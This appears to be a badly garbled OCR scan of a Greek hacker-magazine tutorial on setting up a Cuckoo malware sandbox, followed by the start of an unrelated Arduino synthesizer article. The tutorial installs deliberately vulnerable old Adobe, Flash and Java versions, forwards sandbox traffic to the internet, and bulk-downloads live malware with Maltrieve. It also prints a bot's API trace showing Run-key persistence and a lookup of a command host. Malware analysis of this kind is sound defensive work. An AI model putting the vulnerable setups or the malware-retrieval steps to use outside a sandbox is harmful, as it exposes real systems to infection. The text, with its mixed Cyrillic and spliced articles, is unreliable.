κεια εκτέλεσης του malware. Φυσικἀ, στην проспӣӨға του να κρυφτεί 
£va malware εἶναι πιθανὸ να µην εμφανίζει τίποτε. Ωστόσο η αυτόματη 
λήψη screenshot παρουσιάζει ιδιαίτερο ενδιαφέρον, στην περίπτωση που 
εξετάζουμε trojan horses, τα οποία πλασάρονται συνήθως ως кат! χρήσι- 
ро. Па να έχουμε αυτή τη δυνατότητα, πρέπει να εγκαταστήσουµε στην 
εικονικἠ μηχανὴ και την PIL (Python Imaging Library). Πρὀκειται yia µια 
βιβλιοθήκη της Python, σχετικἠ µε τη διαχείριση γραφικών. Μπορείτε va 
την εγκαταστήσετε κατεβάζοντας κι εκτελώντας το ακόλουθο npóypau- 
μα: http://effbot.org/downloads/PIL-1.1.7.win32-py2.7.exe 


Στη φωλιά του ...Cuckoo 
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Ένα npoaiperikó βήμα που μπορείτε va κάνετε σε αυτό το σημείο, εἶναι то 
να γεμίσετε το εικονικὀ σύστημα µε προγράμματα και ψεύτικα δεδομένα. 
Αυτό θα το θέλατε για τρεις βασικοὺς λόγους. 


1. Πα να δώσετε στο εκάστοτε malware περισσότερα αρχεία µε ra 
οποία µπορεί να αλληλεπιδράσει. Па παράδειγµα, ἑνα malware θα 
μπορούσε ενδεχομένως να ψάχνει για αρχεία Excel στο σύστημα 
(τα опоіа σε αρκετὲς περιπτώσεις περιείχαν ευαἰσθητα στοιχεία 
οικονοµικής φύσεως). 


2. Πα va προσπεράσετε ορισμένους απλούς μηχανισμούς προστασίας 
του malware, Οἱ οποίοι ελέγχουν av το σύστημα ἐχει εγκατεστη- 
μένες εφαρμογές κι αν ὀντως ανήκει σε κἀποιον «φυσιολογικό» 
χρήστη. 


3. Па να δώσετε στο malware τη δυνατότητα va δράσει! Πράγματι, 
προσφάτως ¿xouv κυκλοφορήσει διάφορα malware που εκµεταλ- 
λεύονται αδυναμὶες της Java, rou Flash κ.ά. Επίσης, μεγάλη ζημιά 
κάνουν ορισμένα κακόβουλα αρχεία PDF, τα οποία πολλοί avoi- 
γουν апо ἄγνοια ἡ μετὰ апо λίγη κοινωνική μηχανική. П’ αυτούς Μια отатікђ ІР στο 
λοιπὀν τους λόγους, θα ἦταν χρήσιμο va εγκαταστήσουµε στην VM αποτελεί το 
εικονικἠ μηχανή ορισμένες παλιὲς, ευπαθείς εκδόσεις σχετικὠν πρώτο βήμα για να 


προγραμμάτων. Εμεἰς επιλέξαμε τα ακόλουθα, τα οποία και σας  «Φησουμετο kako- 
προτείνουμε: βουλο πρόγραμμα 
И p: να συνδεθεί στο 


ο Adobe Reader 9.0 anó το www.oldapps.com/adobe reader. Oiaóikruo — nå- 
ντα urió έλεγχο, 


php?old adobe-18 φυσικά. 


му -ᾱ- Local Area Connection Properties [ Үү * 


General | Advanced | 


Connect using: 


HB) AMD PCNET Family PCI Ethernet Ad | Internet Protocol (TCP/IP) Properties 
General 


This connection uses the following items: 

ч " YYou can get IP settings assigned automatically if your network supports 
[| Client for Microsoft Networks this capability, Otherwise, you need to ask your network administrator for 
Fie and Printer Sharing for Microsoft Networks the appropriate IP settings. 


ДЯ) 005 Packet Scheduler 
АЕ Intemet Protocol (TCP/IP) ©) Obtain an IP address automatically 


®© Use the following IP address: 


Uninstal IP οὐάοον (382.168. 56.101 | 


Description 


Transmission Control Protocol/Intemet Protocol. The default уыш ИЕ, НБ, П 
wide area network protocol that provides communication Default gateway: 182.188. 55, 1 
across diverse interconnected networks. i - ` : 


fatus ЕЗ 


Show icon їп notification area when connected Dbtain DNS server address automatically 


Notify me when this connection has limited or no connectivity ®© Use the following DNS server addresses: 


Preferred DNS server: В. 8. 8, 8 


Alternate DNS server: 


η 
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ο Adobe Flash Player 10.1, απὀ το http://fpdownload.macromedia. 
com/get/flashplayer/installers/archive/fp10.l_archive.zip 
(αποσυμπιέἑστε, ппүа!уєтє στον φάκελο 10_1r82_76 ki £ykara- 
στἠήστε ro αρχείο flashplayer 10_1r82_76_winax.exe) 


ο Java 6 Update 18, απὸ TO www.oldapps.com/java.php?old java-55 


Σύνδεση του sandbox στο Cuckoo host 


Έχοντας ολοκληρώσει τα παραπάνω, ο υπολογιστής µας διαθέτει πλέον 
vav Cuckoo host αλλά και µια κατάλληλη εικονική μηχανή, στο ρὀλο 
TOU Cuckoo guest. Το µόνο που μένει εἶναι να συνδέσουµε αυτά τα δύο 
εξαρτήματα και να ρυθµίσουµετις δυνατότητες --ασφαλούς, πάντα-- δι- 
κτύωσης της εικονικἠς μηχανής. Па το прото σκέλος πρέπει να µεταφέ- 
poupe ёха ειδικὀ αρχείο апо την εγκατάσταση του Cuckoo μέσα στην £l- 
κονικἠ μηχανή. Το αρχείο αυτό ονομάζεται agent.py. Αυτή η µεταφορά θα 
γίνει χρησιμοποιώντας την επιλογή διαμοιραζόµενων φακέλων (shared 
folders) μεταξύ του host και του virtual machine, µέσω VirtualBox. 'Exo- 
ντας ανοικτὴ την εικονικἠὴ μηχανὴ, εργαζόµαστε ως εξής: Φτιάχνουμε 
ἑναν κατάλογο κάπου στο host machine και αντιγράφουμµε εκεἰ то αρχεἰο 
agent.py апо τον φάκελο του Cuckoo. Παράδειγμα: 


root@bt :~# 

root@bt :~# 
О! προεργασίες Κατόπιν, επιστρέφουµμε στο κεντρικὀ παράθυρο του VirtualBox, επιλὲ- 
τελείωσαν και pó- γουµε την εικονικἠ μηχανὴ Cuckoo κι ακολουθούμε τη διαδρομή Settings 
λις επιβεβαιώσαμε > Shared Folders > Add Shared Folder (κουμπάκι δεξιά). Στο νέο na- 
от! o agent ο. радиоро nou ανοίγει δίνουμε «/root/VBoxShared» (χωρίς ra εισαγωγικἀ) 
San dbo εἶναι 0 Ὡς Folder Path, και σκέτο «VBoxShared» (χωρίς τα εισαγωγικά) ως Folder 
ио για δράση! Name. Πλέον, ἑνας κοινόχρηστος φάκελος ἐχει δημιουργηθεί μεταξύ του 


x Cuckoo [Running] - Oracle VM VirtualBox 


Machine View Devices Help 


My Documents 


Microsoft Windous XP [Uemsion 5.1.2600] 
СС? Copyright 1985-2001 Microsoft Corp. 


C:\Documents and Settings*scuckooi?netstat -an 
fictive Connections 


Proto Local fiddress i ñddress State 

TCP Β -8: А :B LISTENING 
TCP : x Ξ LISTENING 
TCP .8: š š LISTENING 
TCP . : z š LISTENING 
TCP 7.8 1:5152 A š LISTENING 
TCP š : LISTENING 
UDP 8.8.8.8-445 

UDP β.8.8.8:588 

UDP 0.0.0.0:4500 

UDP 127.0.0.1:123 

UDP 127.0.0.1:1900 

UDP 192.168.56.101:123 

UDP 192.168.56.101:137 

UDP 192.168.56.101:138 

UDP 192.168.56.1801:1988 эе: эе 


C:\Documents and SettingsNscuckoo1> 
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^ v X root@bt: /opt/maltrieve/malware-samples 


root(3bt: /opt/cuckoo 125x21 


updates. 


have the la 
INFO: 
INFO: 
INFO: Wai 


host και του guest kai µπορεἰ va προσαρτηθεἰ (mount) στο sandbox. 
Για va ολοκληρώσουμε τη μεταφορὰ του αρχείου agent.py, ανοίγουμε 
ἑνα παράθυρο των Windows (µέσα στην εικονικἠ μηχανὴ) και στο πεδίο 
Address πληκτρολογούμε τη διαδρομή: «NVBOXSVRWBoxShared» (χωρὶς та 
εισαγωγικἀ). Κάπως έτσι θα εμφανιστεί ο κοινόχρηστος φάκελος και µέσα 
του θα δούμε το αρχείο agent.py, µαζί µε οτιδήποτε ἆλλο ενδέχεται να 
έχουμε ρίξει στον φάκελο. Παΐρνουμε λοιπὀν το αρχείο agent.py και το 
αντιγράφουµε στην επιφάνεια εργασίας. Πριν κλείσουμε το παράθυρο 
TOU explorer, επισκεπτόµαστε τις ρυθμίσεις εμφάνισης αρχείων και pa- 
κέλων, ακολουθώντας τη διαδρομή Tools > Folder Options > View. Εκεὶ 
πρέπει va απενεργοποιήσουµε την απὀκρυψη επεκτάσεων για γνωστούς 
τύπους αρχείων (hide extensions for known file types). Κάνοντας κάτι 
τἐτοιο θα εμφανιστεἰ και η κατάληξη «.ργ», στο буора rou προγράµµατος 
που μόλις αντιγράψαμε. Σημειώστε ὁτι αυτή την επέκταση θα πρέπει va 
την αλλάξουμε σε «.ργνν». Μετά κι απὀ αυτά μπορούμε να αφαιρέσουμε 
To Shared Folder (τρίτο κουμπάκι στις ρυθμίσεις κοινόχρηστων φακέλων) 
και να διαγράψουµε τον κατάλογο VBoxShared апо τον host. 


Па τη ρύθμιση της δικτύωσης της εικονικἠς μηχανῆς εργαζόµαστε ως 
ακολούθως. Κατ’ αρχάς αλλάζουμε τον τρόπο λειτουργίας (mode) της 
εικονικἠὴς κάρτας δικτύου. Αυτό το κάνουμε μέσα απὀ ro VirtualBox, 
επιλέγοντας και пал! τη μηχανή Cuckoo κι ακολουθώντας τη διαδρομἠ 
Settings > Network > Adapter 1 (καρτἐλα). Εκεἰ αλλάζουμε την επιλογἠ 


Το Cuckoo περι- 
μένει να δεχτεί 

τα αρχεία µας... 
Ευτυχώς έχουμε 
το Maltrieve, µε то 
οποίο ψαρεύουμε 
εὐκολα αρκετά κα- 
κόβουλα προγρόμ- 
nara. 
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Analysis Tasks periormed processing and pending analyses 
ID Category Target Added Status 
1 FILE ed3bf27ab1fab514cb97e07ec316f339 2013-02-20 19:12:16.312373 processing 
2 FILE a5b9af4b6a6bc75fbf4b6b1fd759bf4b 2013-02-20 19:12:16.312373 pending 
8 FILE ef5c786e525300bde232eba5988be8d3 2013-02-20 19:12:16.312373 pending 
4 FILE f93cd9b5b8064c72dc69ad1a20d95703 2013-02-20 19:12:16.312373 pending 
5 FILE a73edeb7f6ded177042542751belaff5 2013-02-20 19:12:16.312373 pending 
6 FILE abe67a6b16d98a1710cf2767a772ea0e 2013-02-20 19:12:16.312373 pending 


Μέσα апо ro 
εύχρηστο web 
interface rou 
Cuckoo, μπορού- 
µε va δούμε την 
τρέχουσα оира 
υποβολών, την 
κατάσταση καθε- 
μίας καθώς και Ta 
αποτελέσµατα των 
αναλύσεων. 
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«Attached to» σε <Host-only Adapter». Με auró τον τρὀπο η μηχανή 
μας θα επικοινωνεἰ μόνο µε rov host κι ὀχι απευθείας µε τον £&o κόσμο. 
Βέβαια, av και αυτὸ μοιάζει αρκετά ασφαλές, δεν εἶναι πάντα επιθυμητό. 
Ti θα γίνει για παράδειγµα αν ἑνα malware θελήσει να κατεβάσει ¿va 
αρχείο апо ro Internet; Πα va µην του κόψουμε τη φόρα, µε συνέπεια 
να µας διαφύγει κἀποια απὀ τις λειτουργίες του, θα ενεργοποιήσουµε την 
προώθηση ὁλων των αιτημάτων σύνδεσης της εικονικἠς µηχανἠς προς то 
Διαδίκτυο *иёса* апо το host machine. Па να πετύχουμε κάτι τέτοιο θα 
χρειαστεἰ ката πρώτο λόγο να δώσουμε στην εικονικἠ μηχανὴ στατικἠ 
IP και να ρυθμίσουμε κατάλληλα τον DNS server που θα χρησιμοποιεί. 
AUTÒ το κάνουμε ακολουθώντας τη διαδρομή: Start > Control Panel > 
Network and Internet Connections > Network Connections, εντὸς της 
εικονικἠς μηχανής. Εκεἰ κάνουμε δεξὶ κλικ στο εικονίδιο σύνδεσης, ENI- 
λέγουμε то Properties και στην καρτέλα General κάνουμε διπλὀ κλικ στο 
Internet Protocol (TCP/IP). Ὅπως βλέπετε και στην αντίστοιχη εικόνα, 
δίνουμετις ακόλουθες τιμές!: IP address = 192.168.56.101, Subnet mask 
= 255.255.255.0, Default gateway = 192.168.56.1 και Preferred DNS 
server = 8.8.8.8 (o DNS тпс Google). Πα να λειτουργήσει η npoo8non 
των πακέτων μέσα απὀ rov host, μένει να εφαρμόσουμε και ορισμένους 
κανόνες στο firewall του συστήματος (του BackTrack): 


root@bt:~# iptables -A FORWARD -o eth0 -i vboxnet8 -s 
192.168.56.0/24 -m conntrack —ctstate NEW -j ACCEPT 


root@bt:~# iptables -A FORWARD -m conntrack —ctstate 
ESTABLISHED, RELATED -j ACCEPT 


root@bt:~# iptables -A POSTROUTING -t nat -j MASQUERADE 
root@bt:~# sysctl -w net.ipv4.ip_forward=1 


Λάβετε υπόψη бт! οι παραπάνω κανόνες χάνονται κάθε φορά nou Kå- 
νουµε επανεκκίνηση στο μηχάνημα (host). Επομένως, κάθε φορὰ που 
TO ενεργοποιούµε και θέλουμε να δουλέψουμε µε ro Cuckoo, πρέπει va 
εισάγουµε και πάλι τους κανόνες. Mia καλή λύση για να αποφεύγουμετις 
περιττὲς και κουραστικὲς επαναλήψεις, εἶναι να βάλουμε τους κανόνες σε 
£va BASH script. (Πα то BASH scripting, δείτε και TO σχετικὀ άρθρο ото 
deltaHacker 016.) 


1. Στο ¿va και μοναδικὀ host-only network rou VirtualBox της δικἠς μας εγκατάστασης, о! διευθύνσεις εἶναι 
της μορφής 192.168.56.*. Πιθανώς το ἰδιο θα ισχύει και στη δικἠ σας περίπτωση, καλού κακού όμως pi&re µια 
ματιὰ ακολουθώντας, στο παράθυρο VirtualBox Manager, τη διαδρομή File > Preferences > Network. Δείτε τι 
συμβαίνει στο παράθυρο Host-only Networks. 
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Τελειώνοντας, πραγματοποιούµε µια επανεκκἰνηση της εικονικἠς µηχα- 
ус̧, yia να βεβαιωθούμµε оті λειτουργεί σωστά. Όταν ξεκινήσει το guest 
OS (τα Windows ΧΡ) εκτελοὐμε το αρχείο agent.pyw, που εἶχαμε τοποθε- 
τήσει στην επιφάνεια εργασίας. Πλέον, ο Cuckoo guest εἶναι ἐτοιμος και 
περιμένει οδηγἰες anó rov Cuckoo host. Тора εἶναι η κατάλληλη στιγμή 
για να κρατήσουμε ἑνα snapshot της εικονικἠς μηχανής. Έτσι, κάθε фора 
που θα αναλύεται ἑνα malware, ro Cuckoo θα µπορεἰ va επαναφέρει την 
εικονικἡ μηχανὴ στην αρχικὴ της, καθαρἠ κατάσταση. Πα τη δηµιουργία 
TOU snapshot και την επανεκκίνηση της μηχανής, μπορούμε να δώσουμε 
τα ακόλουθα: 


root@bt:~# VBoxManage snapshot "Cuckoo" take "Malware Sandbox" -- 
pause 


root(bt:-4 VBoxManage controlvm "Cuckoo" poweroff 
root@bt:~# VBoxManage snapshot "Cuckoo" restorecurrent 


Εἰμαστε σχεδὸν ἐτοιμοι για ανάλυση malware. Αυτὸ που λείπει εἶναι µια 
µικρή Tpononoinor στο αρχείο ρυθμίσεων rou Cuckoo, στη διαδρομή / 
opt/cuckoo/conf/virtualbox.conf. Το ανοίγουμε µε κάποιον text editor κι 
αλλάζουμε τη γραμμή 18 σε label = Cuckoo (το οποίο αντιστοιχεὶ στο 
ακριβὲς ὀνομα που δώσαμε στην εικονικἠ μηχανὴ). Με την ευκαιρία, yno- 
ρούμε να ρίξουμε µια ματιὰ και στο αρχείο cuckoo.conf, που βρίσκεται 
στον ідо κατάλογο. О προεπιλογἐς του πάντως εἶναι ικανοποιητικὲς και 
κρίνονται επαρκεἰς για τα περισσότερα σενάρια χρήσης. 


Αυτοματοποιηµένη ανάλυση 


Тора μπορούμε να καθίσουμε ava- 
παυτικἀ στην καρέκλα µας. Εἶμα- 
στε ἑτοιμοι για δεκάδες ἡ ακόµα κι 
εκατοντάδες αναλύσεις! Το Cuckoo 
λειτουργεὶ ως εξἠς: То λογισμι- 
KÓ εκτελείται επαναληπτικἀ στον 
Cuckoo host και περιμένει να του 
δώσουμε κάποιο δείγμα malware. 
Μόλις γίνει кат! τέτοιο, το δείγμα 
τοποθετείται σε µία ουρά αναμονής 
κι ενεργοποιείται κἄποιο апо τα õi- 
αθέσιµα sandboxes. Αφού oraei 
το δείγμα στο sandbox, εκτελεστεί 
κι επιστραφούν τα αποτελέσµατα, 
η διαδικασία περνάει στο επόμενο 
δείγμα malware κ.ο.κ. Την υποβολή 
malware στο Cuckoo μπορούμε να 
την πραγματοποιήσουμε EITE µέσω 
κονσόλας εἶτε μέσω web interface. 
H κονσόλα θα λέγαμε бт! εἶναι nio 
βολικἠ, ενώ το web interface χρη- 
σιμοποιείται κυρίως για την επι- 
σκόπηση των αποτελεσμάτων της 
ανάλυσης. Ανοίγουμε λοιπὸν va 
τερματικὀ και ξεκινάμε το Cuckoo: 


Signatures mai 


Creates a Windows executable on the filesystem 


Static Analysis ьгпзгу зегі 


Version Infos 
Sections 
Imports 


Dropped Files те: < 


oid 
eated or 


root@bt:~# cd /opt/cuckoo/ 
root(bt:/opt/cuckoos python cuckoo.py 


eíce822862e5fbba6f1bad62c71d143a.exe 


Ένα uikpó μέρος 
των αποτελεσμά- 
των µιας ανάλυσης. 
Βλέπουμε πως 

το Cuckoo πήρε 
μερικὰ ωραιότατα 
screenshots µε 
éva μήνυμα του 
malware, ενώ 
δεν παρέλειψε να 
καταγράψει και τη 
δημιουργία ενός 
αρχείου. 


Screenshots pictures ot the desktop during execution 
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Ακολούθως μπορούμε va υποβάλουμε éva malware sample, Χρησιµοποι- 
ὠντας ro script submit.py (βρίσκεται στον υποκατάλογο utils). Па να 
κάνουμε κάτι τέτοιο, ανοίγουμε µια νέα καρτέλα στο τερματικὀ και трё- 
χουμε το script µε τον ακόλουθο τρόπο: 


root@bt:~# python /opt/cuckoo/utils/submit.py αρχείο ή φάκελος. 
MALWARE 


Αυτὸς εἶναι o γενικὸς τρόπος υποβολής. Ωστόσο, τρέχοντας ro submit.py 
µε την παράμετρο -h, μπορούμε να δούμε πρόσθετες λεπτομέρειες για 
το χειρισμὸ του. Πα παράδειγµα, μπορούμε av θέλουμε να καθορίσουμε 
σε ποιο sandbox θα τρέξει το εκάστοτε δείγμα, τι προτεραιότητα ἐχει µια 
συγκεκριμένη υποβολή σε σχέση нє TIG υπόλοιπες κ.ο.κ. 


Όπως και στα προηγούμενα ἀρθρα της сєрёс̧, στα τεύχη 016 και 017, 
προκύπτει και πάλι το ζήτημα εὐρεσης αρχείων malware. Θα θυµόσαστε 
Φυσικά бт! αυτό το λύναμε πηγαἰνοντας στα αποθετἠρια κακόβουλων ap- 
χείων, όπως το Offensive Computing, http://offensivecomputing.net, ка! 
κατεβάζοντας апо εκεἰ συγκεκριµένα δείγματα. Aurr| η πρακτικἠ όμως 
δεν εἶναι η καλύτερη δυνατή στην τωρινή µας περίπτωση. Υποτίθεται 
ὁτι στήσαμε ὁλο αυτὸ το περιβάλλον yia να μπορούμε να αναλύουμε 
δεκάδες δείγματα µε αυτοματοποιημένο τρὀπο κι ὀχι ёха προς ἑνα. Kå- 
που εδὠ έρχεται va µας βοηθήσει ro εργαλεἰο ονόματι Maltrieve (апо τις 
λέξεις malware retrieve). Στην ουσία, πρὀκειτα!ι για ἑνα Python script 
το onoio επισκέπτεται online λίστες µε URLs nou διακινούν malware και 
κατεβάζει τα μολυσμένα αρχεἰα σε &vav τοπικὀ φάκελο. Με àiya λόγια, 
αποτελεί ἑνα πολύ χρήσιμο εργαλείο µε τη βοήθεια rou οποίου μπορούμε 
να κατεβάζουμε μικρὲς ἡ μεγάλες ποσότητες κακόβουλου λογισμικού. To 
εγκαθιστούµε ως εξής: 


root@bt:~# pip install BeautifulSoup4 
root(bt:-4 cd /opt 
root(bt:/optit git clone git://github.com/technoskald/maltrieve.git 


To Maltrieve δεν παρέχει και πολλὲς επιλογἐς. Ἀρκεί να φτιάξουμε évav 
φάκελο στον οποίο θα αποθηκεύονται να δείγματα malware και va το 
τρἐξουµε: 


root@bt:~# mkdir /opt/maltrieve/malware-samples 
root@bt:~# cd /opt/maltrieve/ 
root(bt:/opt/maltrieves python maltrieve.py -d malware-samples/ 


To Maltrieve θα αρχίσει αµέσως va διαβάζει διάφορες (online) λίστες 
και να κατεβάζει το αντίστοιχο υλικό. Μπορούμε va παρακολουθήσου- 
µε τη διαδικασία των λήψεων, κοιτάζοντας τα αρχεία που ¿xouv катё- 
βει στον κατάλογο malware-samples. Μόλις θεωρήσουμε ότι έχουμε KA- 
τεβάσει αρκετά δείγματα, μπορούμε να διακὀψουµε τη λειτουργία του 
maltrieve. Στη συνέχεια, μπορούμε να υποβάλουμε ολόκληρο τον Ka- 
τἀλογο malware-samples στο Cuckoo, χρησιμοποιώντας το submit.py. 
Μόλις κάνουμε кайт! τέτοιο, θα αρχίσουν να εμφανίζονται πολλά απανω- 
τὰ μηνύματα, τα οποία θα µας ενημερώνουν ὁτι τα αρχεία του φακέλου 
προστίθενται (το va μετά ro ἄλλο) στην ουρά αναμονής του Cuckoo. 
Επιστρέφοντας στο τερματικὀ ὁπου εκτελεἰται το cuckoo.py, θα δούμε 
ότι η ανάλυση ἐχει бп ξεκινήσει. Σε λίγο θα εμφανιστεί μπροστὰ µας και 
η εικονικἠ μηχανὴ που χρησιμοποιεί то Cuckoo. 


Па να πάρουμε τα αποτελέσµατα της εκάστοτε ανάλυσης, καθὼς και για 
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va υποβάλουμε κάποιο malware sample, μπορούμε va στραφούμε στο 
web interface rou Cuckoo. Προκειμένου va ενεργοποιηθεί, οφείλουμε va 
εκτελἐσουµε το ακὀλουθο script: 


root@bt:~# python /opt/cuckoo/utils/web.py 


Κατόπιν, арке! ν΄’ ανοίξουμε £vav web browser και να επισκεφθούμε τη 
διεύθυνση http://localhost:8080. Από την αρχικἡ σελίδα μπορούμε να 
αποστείλουµε kànoio malware για ανάλυση, ενώ πατώντας στο Browse 
μπορούμε να δούμε την κατάσταση της ουράς αναµονἠς, καθώς και та 
αποτελέσµατα κἆθε ανάλυσης. 


Επίλογος 


Κάπου εδὠ θα σας αφήσουμε ελεύθερους να πειραματιστεῖτε µε το 
Cuckoo και να ανακαλύψετε τις πρόσθετες δυνατὀτητὲς του. Θυμηθείτε 
оті Εκεἰ Έξω (TM) υπάρχουν χιλιάδες δείγματα malware και περιμένουν 
να та αναλύσετε και να διδαχτείτε апо τη συμπεριφορά τους. Τέλος, 
πρέπει να τονίσουμε akóun μία фора óri η ανάλυση malware αποτελεὶ 
ἑναν ζὀρικο τομέα της ασφάλειας υπολογιστών, ο οποίος απαιτεἰ αρκετὲς 
γνώσεις και κόπο για να εκτελεστεί σωστά. Στα τρία άρθρα της сєрёс̧ 
μας, που ξεκίνησε απὸ το deltaHacker 016, παρουσιάσαμε μόνο μερικὲς 
βασικὲς τεχνικές. Κλείνουμε µε την παρότρυνση να µην περιοριστεἰτε 
σε ὁσα εἰπαμε και να ασχοληθεἰτε περαιτέρω апо μόνοι σας. Εἱμαστε 
σίγουροι πως, αν σας ενδιαφἑρει η ασφάλεια συστημάτων, δεν θα το 
μετανιώσετε καθόλου. 


Σας θυμίζει κάτι; Το Cuckoo μόλις ανέλυσε το bot που 
είχαμε αναλύσει χειροκίνητα, στο deltaHacker 017. Όπως 
βλέπουμε, κατέγραψε αυτόματα ὁλα τα ενδιαφέροντα 
στοιχεία που εἰχαμε ανακαλύψει κι εμείς :) 


18:42:47,408 1520 DeleteFileA FileName => C: NWINDOWSNsystem32Nspoolsvc.exe 


18:42:47,418 1520 СоруҒіЛед ExistingFileName => C: \DOCUME~1\Sandbox\LOCALS~1\Temp\malware. exe 
NewFileName => C: NWINDOWSNsystem32Nspoolsvc.exe 


18:42:47,418 1520 — RegCreateKeyExA Registry => 0х80000002 


SubKey => SoftwareMicrosoftWindowsNCurrentVersionNRun 


Class => 
Access => 983103 
Handle => θχθθθθθθθς 


18:42:47,418 1520 — RegSetValueExA Handle => θχθθθθθθθς 
ValueName => Windows DLL Loader 
Type => 1 
Buffer => C: WINDOWSNsystem32Vmalware.exeNNx00 
18:42:47,418 1520 RegCloseKey Handle => θχθθθθθθθς 
18:42:47,418 1520 — WSAStartup VersionRequested => 0x00000202 
18:42:47,418 1520 — NtDelayExecution Milliseconds => 1980 
18:42:48,430 1520 getaddrinfo NodeName => l.f8e.biz 


ServiceName => 9889 


Intermediate 
Ae 


~ JTags: FM 
synthesis, beat 
pattern, tempo, 


Markov Chains 


š L. [s — pe тт 


Arduino Sound Mast 


part 4/όσο χρειαστεί 


Тора που ξεμπερδέψαµε µε 
τις τεχνικές σύνθεσης κυμάτων 
μπορούμε να κάνουμε va μικρὀ 
διάλειμμα — μουσικὀ, φυσικά! Σε 
αυτό το άρθρο θα αξιοποιήσουμε 
όσα ἔχουμε μᾶθει oc ropa, θα 
δούμε μερικά ακόμη κολπάκια 
και θα κατασκευάσουµε éva 
synthesizer το onoio θα παίζει 
μουσικἠ апо μόνο του. 
ас» ped 


\ 
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Με τις τεχνικὲς που έχουμε μελετήσει ως тора εἰναι δυνατὸ, θεωρητικά 
τουλάχιστον, να συνθέσουµε τα ηχητικἁ κύματα που παράγει οποιοδἠ- 
ποτε μουσικό ὀργανο. Εμεὶς βέβαια δεν βαλθήκαμε να κατασκευάσουµε 
τον υπέρτατο προσομοιωτἠ μουσικών οργάνων. Θέλουμε µόνο va εξε- 
ρευνήσουμε τις προγραμματιστικὲς τεχνικές, µε τη βοήθεια των οποίων 
οι παλιοί υπολογιστὲς παρήγαγαν τον ἦχο των επἰσης παλιών παιχνιδιών. 
H ισχὺς εκείνων των υπολογιστών Tav εξαιρετικἀ περιορισμένη. Eno- 
μένως, η δημιουργία εντυπωσιακὠν ηχητικὠν εφἑ δεν απαιτούσε µόνο 
χρόνο (όπως сорВаім ката κύριο λὀγο σήµερα), αλλά και µεγάλο npo- 
γραμματιστικὀ ταλέντο. Е, λοιπόν, η γνωριμία µας µε αυτού του εἶδους 
τα τεχνάσματα θα συνεχιστεἰ και, θέλουμε να πιστεύουμε, θα γίνει ακόµα 
nio διασκεδαστικἠ. Topa nou ξεμπερδέψαμε µε τις μεθόδους σύνθεσης 
ηχητικών κυμάτων, μπορούμε να ασχοληθούμε µε τη σύνθεση μουσικἠς. 
Μη φανταστείτε От! θα ξεκινήσουμε μαθήματα αρμονίας ἡ τίποτε τέτοιο. 
O γράφων ἐχει εξαιρετικἁ περιορισμένες γνώσεις γύρω апо τη µουσικἠ 
και δεν του αρέσει να μπαίνει σε ξένα χωράφια. Ωστόσο, στο παρὀν àp- 
Өро θα κατασκευάσουµε ёха synthesizer το onoio 8a παἰζει µουσικἠ апо 
μόνο του! 


Νέες προκλήσεις 


To прбүранна που θα φτιάξουμε θα υλοποιεί τρία κανάλια ñxou ἡ, όπως 
αλλιώς λέμε, τρεις φωνές. Ως εκ τούτου, TO synthesizer θα μπορεὶ va 
αναπαράγει ἑως και τρεις νότες ταυτόχρονα. H αναπαραγωγἠ των poudi- 
Kov φθόγγων! θα πραγματοποιείται µε ἑνα συγκεκριµένο ρυθμὀ. Με ἄλλα 
λόγια, το πρὀγραμμα θα ξεκινάει την avanapayoyr| των νέων φθόγγων 
µε µια συγκεκριμένη συχνότητα. Па va κατανοήσετε καλύτερα τι EVVO- 
оон εδώ, υποθέστε бт! ἐχουμε ορίσει αυτή τη συχνότητα στο 1Hz. AUTÒ 
σημαίνει ὁτι το проүрарра θα παἰζει μία νέα νότα κάθε δευτερόλεπτο 
και κατ’ επέκταση 60 νότες το λεπτὀ. Αυτὸ σημαίνει бт! η αναπαραγωγή 
μουσικών φθόγγων θα πραγματοποιείται µε ρυθμὀ 60bpm. Νομίζουμε 
ὁτι το μέγεθος bpm (beats per minute) εἶναι γνώριμο και γι’ αυτὸ δεν 
θα δώσουμε συνέχεια. Φανταστείτε тора ὁτι ο ρυθμός που ακολουθεἰ 
το πρὀγραμμἁ µας προκύπτει апо τους χτύπους ενὸς ρολογιού. Εάν το 
πρὀγραμμἁ µας naie µια νότα στο ΞκάθεἈ κανάλι και σε «κάθεξ χτύ- 
πο του ρολογιού, θα ἦταν πολύ πιθανὸ να προκύψει µια μονότονη και 
κουραστικἠ σύνθεση. Па να αποφύγουμε кат! τέτοιο, το πρὀγραμμἁ µας 
θα ἐχει τη δυνατότητα va παἰζει νότες ακολουθώντας διάφορα μοτίβα 
(beat patterns), µε τη βοήθεια των οποίων η avanapayoyr| θα napou- 
σιάζει εναλλαγές. Па παράδειγµα, φανταστείτε να παράγεται апо μία 
νότα σε δύο διαδοχικούς χτύπους του ρολογιού, στον τρίτο χτύπο va 
μην παράγεται τίποτα, στους επὀµενους δύο να παράγεται пал! апо μία 
νότα kai πάει λέγοντας. Επιπρὀσθετα, ro πρὀγραμμα θα εἶναι σε θέση va 
ακολουθεί διαφορετικἁ μοτίβα για κάθε κανάλι ἠχου. Z' αυτό το σημείο 
πρέπει να τονίσουμε бт! o μηχανισμὸς µε τα μοτίβα δεν εξασφαλίζει πως 
η τελικἠ σύνθεση θα εἶναι μελωδική και ευχάριστη. H υποστήριξη των 
μοτίβων καταφέρνει μόνο να αυξήσει την πολυπλοκότητα των µελωδιών 
που θα παράγονται. Έτσι, το μόνο σίγουρο εἰναι бт! οι πειραματισμοἰ µε 
τον κὠδικα θα xouv ενδιαφέρον ;) Τέλος, το πρὀγραμμὰ µας θα πρέπει 
να επιλέγει τις νότες µε µια φαινομενικἁ ανεξάρτητη βούληση, алла оҳ 
και εντελώς τυχαία. Το πρόγραμμα, δηλαδὴ, θέλουμε va παρουσιάζει ша 
κάποια ευφυΐα. Αν η επιλογἠ γινόταν εντελώς τυχαία, η τελικἠ σύνθεση 
θα ἦταν αλλοπρόσαλλη και θα ἐμοιαζε παρανοϊκή. Αντίθετα, αν ro npó- 


1. Τις νότες εννοούμε, αλλά δεν θέλαμε va επαναλάβουµε τη λέξη :D 
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γραμμα έπαιζε συγκεκριμένες νότες και µε συγκεκριμένη σειρὰ, τότε θα 
ακούγαμε πάντα τα ἴδια και τα ἰδια. Το ζητούμενο εἶναι να ακούμε πάντοτε 
κάτι διαφορετικὀ, το οποίο ωστόσο να παρουσιάζει µια κάποια δομὴ και 
ката kánoiov τρόπο va εἶναι γνώριμο. Αν αναλογιστούμε бт! το Arduino 
δεν έχει νοημοσύνη, πολλὼ δε μάλλον γνώσεις αρμονίας, αντιλαμβάνε- 
στε ὁτι το ζήτημα της δοµἠς παρουσιάζει ιδιαἰτερο ενδιαφἑρον. 


